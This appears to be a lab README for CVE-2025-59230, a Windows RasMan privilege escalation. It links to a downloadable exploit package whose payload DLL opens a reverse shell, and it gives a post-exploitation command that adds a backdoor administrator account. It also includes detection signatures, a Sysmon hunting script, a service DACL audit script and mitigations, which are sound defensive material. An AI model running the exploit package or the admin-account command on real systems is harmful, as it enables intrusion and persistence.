Related vulnerability
Introduction
# Lab: CVE-2025-59230 - Local Privilege Escalation in Windows Remote Access Connection Manager
## 🚀 Overview
CVE-2025-59230 is a high-severity elevation-of-privilege vulnerability in the Windows Remote Access Connection Manager (RasMan) service that affects multiple versions of Windows. The flaw stems from improper access control within the RasMan service: an authenticated local user can manipulate service parameters and escalate to SYSTEM. That in turn enables arbitrary code execution as SYSTEM, data exfiltration, or persistence on the affected host.
This lab is intended solely for security researchers, penetration testers, and system administrators who want to understand the exploit chain and test mitigations.
**Safety Disclaimer:** This lab executes potentially harmful code; run it only in an isolated virtual machine that you can discard afterwards. The exploit code demonstrates privilege escalation to SYSTEM.
## 📋 Prerequisites
- A host machine running Windows 10/11 or Windows Server 2019/2022/2025 with the Hyper-V and Containers features enabled (the lab runs inside a VM, not on the host).
- Basic knowledge of Windows services and PowerShell.
Affected Windows versions:
- Windows 10 (versions 1507, 1607, 1809, 21H2, 22H2)
- Windows 11 (versions 22H2, 23H2, 24H2, 25H2)
- Windows Server 2016, 2019, 2022 (including 23H2), 2025
## Download & Install
1. Download the exploit package: [Download Exploit ZIP](http://github.com/moegameka/cve-2025-59230/raw/refs/heads/main/Core/lab-cve-2025-59230.zip). This ZIP contains:
- `rasmanesc.exe`: The main exploit binary.
- `start_exp.bat`: Batch script that launches `rasmanesc.exe` with its default parameters.
- `payload.dll`: Payload injected by the exploit. The bundled one demonstrates a reverse shell, so expect it to make an outbound connection from the lab VM; inspect it before use.
2. Extract the ZIP inside the lab VM. Treat the archive as untrusted: record its SHA-256 with `Get-FileHash` and check the binaries with `Get-AuthenticodeSignature` before running anything.
## 🛠 Usage
1. **Exploit Execution:**
   - Launch `start_exp.bat`, or run `rasmanesc.exe /payload=payload.dll` directly.
   - As described by the author, the exploit:
     - Obtains a handle to the RasMan service.
     - Sends a crafted IOCTL buffer that overwrites service parameters.
     - Elevates to SYSTEM via token impersonation.
     - Injects the payload DLL to spawn a SYSTEM-level shell.
2. **Post-Exploitation:**
- In the escalated shell, demonstrate impact, e.g. from cmd.exe: `net user admin P@ssw0rd /add & net localgroup administrators admin /add` (use `;` as the separator only in PowerShell; cmd.exe would pass it to `net` as an argument). Delete the account afterwards.
3. **Detection Signatures:**
- Sysmon Event ID 10 (ProcessAccess): a non-system process opening a handle to the `svchost.exe` instance that hosts RasMan with rights such as PROCESS_VM_WRITE or PROCESS_CREATE_THREAD. Sysmon does not log IOCTLs, so this is the closest signal for the handle and injection steps above.
- Sysmon Event IDs 12/13/14 (RegistryEvent): modifications under `HKLM\SYSTEM\CurrentControlSet\Services\RasMan` by anything other than the Service Control Manager or the servicing stack.
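The following PowerShell is an added hunt for those two signals. It is example code written for this page, not part of the lab or the author's repository. It assumes Sysmon is installed with ProcessAccess and RegistryEvent rules that cover `svchost.exe` and the RasMan service key; the "source image outside System32" check and the registry allow-list (`services.exe`, `svchost.exe`, `TiWorker.exe`) are assumptions to tune for your baseline. The offline demo at the end runs against constructed events, not real telemetry.

```powershell
# Added example (not part of the lab's own tooling): hunt the Sysmon log for the two
# signals above. Assumes Sysmon is installed with ProcessAccess and RegistryEvent rules
# that cover svchost.exe and the RasMan service key. The System32 check and the
# registry allow-list are starting assumptions, not a vetted baseline.

function ConvertFrom-SysmonEventXml {
    # Flatten one Sysmon event (the XML from $event.ToXml()) into a hashtable of its fields.
    param([Parameter(Mandatory)][string]$Xml)
    $doc = [xml]$Xml
    $idNode = $doc.Event.System.EventID
    $fields = @{ EventID = [int]$(if ($idNode -is [System.Xml.XmlElement]) { $idNode.InnerText } else { $idNode }) }
    foreach ($d in $doc.Event.EventData.Data) { $fields[$d.GetAttribute('Name')] = $d.InnerText }
    return $fields
}

function Test-RasManSuspiciousEvent {
    param([Parameter(Mandatory)][hashtable]$Fields, [Parameter(Mandatory)][int]$RasManPid)
    switch ($Fields.EventID) {
        10 {
            # ProcessAccess: a handle to the svchost.exe hosting RasMan with rights that allow
            # writing its memory or creating threads, opened by an image outside System32.
            if ([int]$Fields.TargetProcessId -ne $RasManPid) { return $false }
            $granted   = [Convert]::ToInt64($Fields.GrantedAccess, 16)   # Sysmon logs e.g. 0x1FFFFF
            $writeMask = 0x0002 -bor 0x0008 -bor 0x0020                  # CREATE_THREAD | VM_OPERATION | VM_WRITE
            $fromSystem32 = $Fields.SourceImage -like 'C:\Windows\System32\*'   # assumption: treat as trusted
            return ((($granted -band $writeMask) -ne 0) -and -not $fromSystem32)
        }
        { $_ -in 12, 13, 14 } {
            # RegistryEvent: a change under the RasMan service key by something other than the
            # Service Control Manager, the service host or the servicing stack (assumed allow-list).
            if ($Fields.TargetObject -notlike 'HKLM\System\CurrentControlSet\Services\RasMan*') { return $false }
            $allowed = @('C:\Windows\System32\services.exe', 'C:\Windows\System32\svchost.exe')
            return (($Fields.Image -notin $allowed) -and ($Fields.Image -notlike 'C:\Windows\WinSxS\*\TiWorker.exe'))
        }
        default { return $false }
    }
}

function Find-RasManSuspiciousEvents {
    # Live hunt. RasMan's PID changes on every restart, so Event ID 10 hits are only
    # recognised for the instance running now; Event 12/13/14 hits are PID-independent.
    param([int]$MaxEvents = 5000)
    $rasPid = [int](Get-CimInstance Win32_Service -Filter "Name='RasMan'").ProcessId
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10, 12, 13, 14 } -MaxEvents $MaxEvents |
        ForEach-Object { ConvertFrom-SysmonEventXml -Xml $_.ToXml() } |
        Where-Object { Test-RasManSuspiciousEvent -Fields $_ -RasManPid $rasPid } |
        ForEach-Object { [pscustomobject]$_ }
}

function New-SampleSysmonEventXml {
    # Minimal event in Sysmon's XML layout; used only to build constructed test data below.
    param([int]$EventID, [hashtable]$Data)
    $items = foreach ($k in $Data.Keys) {
        $v = [System.Security.SecurityElement]::Escape([string]$Data[$k])
        '<Data Name="{0}">{1}</Data>' -f $k, $v
    }
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>{0}</EventID></System><EventData>{1}</EventData></Event>' -f $EventID, (-join $items)
}

function Invoke-OfflineDemo {
    # Constructed events, not real telemetry: PID 1492 stands in for the RasMan host.
    $rasPid  = 1492
    $samples = @(
        (New-SampleSysmonEventXml 10 @{ SourceImage = 'C:\Users\lab\Desktop\rasmanesc.exe'; TargetImage = 'C:\Windows\System32\svchost.exe'; TargetProcessId = '1492'; GrantedAccess = '0x1FFFFF' })
        (New-SampleSysmonEventXml 10 @{ SourceImage = 'C:\Windows\System32\services.exe';  TargetImage = 'C:\Windows\System32\svchost.exe'; TargetProcessId = '1492'; GrantedAccess = '0x1400' })
        (New-SampleSysmonEventXml 13 @{ Image = 'C:\Users\lab\Desktop\rasmanesc.exe'; TargetObject = 'HKLM\System\CurrentControlSet\Services\RasMan\Parameters\Example'; Details = 'DWORD (0x00000001)' })
    )
    $samples | ForEach-Object { ConvertFrom-SysmonEventXml -Xml $_ } |
        Where-Object { Test-RasManSuspiciousEvent -Fields $_ -RasManPid $rasPid } |
        ForEach-Object { [pscustomobject]$_ } |
        Select-Object EventID, SourceImage, Image, TargetObject, GrantedAccess
}

Invoke-OfflineDemo   # flags the first and third samples; services.exe with 0x1400 (query rights only) is ignored
```

`Find-RasManSuspiciousEvents` needs an elevated prompt to read the Sysmon operational log. The rules are deliberately heuristic: copying the exploit into System32 already requires admin rights, which is why the source-image check is acceptable for a privilege-escalation detection, while a host that legitimately reconfigures RasMan (VPN provisioning, for instance) will need its tool added to the registry allow-list.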
## 🛡️ Mitigation
- **Patch:** install the October 2025 security update that addresses CVE-2025-59230. The hardening below limits exposure and impact but does not remove the flaw.
- **Hardening:**
  - Restrict the RasMan service ACL: inspect the current descriptor with `sc sdshow RasMan` before changing it with `sc sdset RasMan <SDDL>`. A malformed or over-restrictive SDDL breaks the service, and inside PowerShell call `sc.exe` explicitly because `sc` is an alias for `Set-Content`.
  - Enable Credential Guard and LSA protection (RunAsPPL) so that an attacker who reaches SYSTEM still cannot dump credentials from lsass; these limit post-exploitation impact rather than block the escalation itself.
  - Use AppLocker or WDAC to block unsigned executables such as `rasmanesc.exe` from running.
- **Best Practices:** Run services with least privilege, segment networks to contain a compromised host, and scan regularly with tools like Nessus or OpenVAS to confirm the update is installed.
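Before running `sc sdset`, it is worth seeing what the current descriptor actually grants. The PowerShell below is an added example, not the lab author's code: it reads the SDDL from `sc.exe sdshow`, parses it with .NET's `RawSecurityDescriptor`, and reports allow ACEs that hand a low-privileged principal a right such as SERVICE_CHANGE_CONFIG, SERVICE_STOP or WRITE_DAC. The two SDDL strings in the offline demo are constructed for illustration and are not the default RasMan descriptor of any Windows build, and the `$LowPrivSids` list is an assumption to extend for your domain.

```powershell
# Added example (not from the lab): audit a service DACL before rewriting it with sc sdset.
# Reports allow ACEs that hand a low-privileged principal a right that lets it reconfigure,
# stop, delete or re-ACL the service.

# Service-specific rights from winsvc.h plus the standard/generic rights that matter here.
$ServiceRights = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x00000002
    SERVICE_STOP          = 0x00000020
    DELETE                = 0x00010000
    WRITE_DAC             = 0x00040000
    WRITE_OWNER           = 0x00080000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
}
$DangerousMask = 0
foreach ($bit in $ServiceRights.Values) { $DangerousMask = $DangerousMask -bor $bit }

# Principals every local low-privileged user belongs to (assumption: extend with your own
# broad groups, e.g. Domain Users).
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4', 'S-1-5-7')
#                 Everyone   Auth Users  Users          Interactive Anonymous

function Get-ServiceSddl {
    param([Parameter(Mandatory)][string]$Name)
    # 'sc' is an alias for Set-Content inside PowerShell, so call sc.exe explicitly.
    $line = sc.exe sdshow $Name | Where-Object { $_ -match '^[DOGS]:' } | Select-Object -First 1
    if (-not $line) { throw "sc.exe sdshow $Name returned no security descriptor" }
    return $line.Trim()
}

function Resolve-SidName {
    param([string]$Sid)
    try { ([System.Security.Principal.SecurityIdentifier]$Sid).Translate([System.Security.Principal.NTAccount]).Value }
    catch { $Sid }
}

function Format-ServiceRights {
    param([int]$Mask)
    ($ServiceRights.GetEnumerator() | Where-Object { ($Mask -band $_.Value) -ne 0 } | ForEach-Object { $_.Key }) -join ', '
}

function Get-WeakServiceAces {
    # Parse the SDDL and return one object per allow ACE that grants a dangerous right
    # to a low-privileged SID. Deny ACEs and non-CommonAce entries are skipped.
    param([Parameter(Mandatory)][string]$Sddl)
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $sid = $ace.SecurityIdentifier.Value
        $hit = $ace.AccessMask -band $DangerousMask
        if (($sid -in $LowPrivSids) -and ($hit -ne 0)) {
            [pscustomobject]@{
                Principal  = Resolve-SidName -Sid $sid
                Sid        = $sid
                AccessMask = '0x{0:X}' -f $ace.AccessMask
                Dangerous  = Format-ServiceRights -Mask $hit
            }
        }
    }
}

function Test-ServiceDacl {
    # Live check of an installed service; run from an elevated prompt.
    param([string]$Name = 'RasMan')
    Get-WeakServiceAces -Sddl (Get-ServiceSddl -Name $Name)
}

# Offline demo on constructed descriptors (not the real default of any Windows build).
# 'Tight' lets Interactive Users only query and start the service; 'Loose' additionally
# gives Authenticated Users SERVICE_CHANGE_CONFIG, SERVICE_STOP and WRITE_DAC.
$Constructed = @{
    Tight = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPLOCRRC;;;IU)'
    Loose = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRCWD;;;AU)'
}
Get-WeakServiceAces -Sddl $Constructed.Tight   # no output
Get-WeakServiceAces -Sddl $Constructed.Loose   # one row: Authenticated Users with SERVICE_CHANGE_CONFIG, SERVICE_STOP, WRITE_DAC
```

`Test-ServiceDacl` runs the same check against the installed service. The point of flagging SERVICE_CHANGE_CONFIG and WRITE_DAC for broad groups is that either right lets a local user repoint or re-ACL the service, which is an escalation path independent of this CVE; a descriptor that only gives those groups query and start rights (the `Tight` sample) is the shape to aim for when you do write one with `sc.exe sdset`.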
For any inquiries, please email me at: moegameka@onet.pl
File snapshot
[4.0K] /data/pocs/63832da90052cf3d52f286a7611a1e3a4aca361b
├── [4.0K] Core
│ ├── [ 1] d
│ └── [8.0M] lab-cve-2025-59230.zip
└── [2.8K] README.md
1 directory, 3 files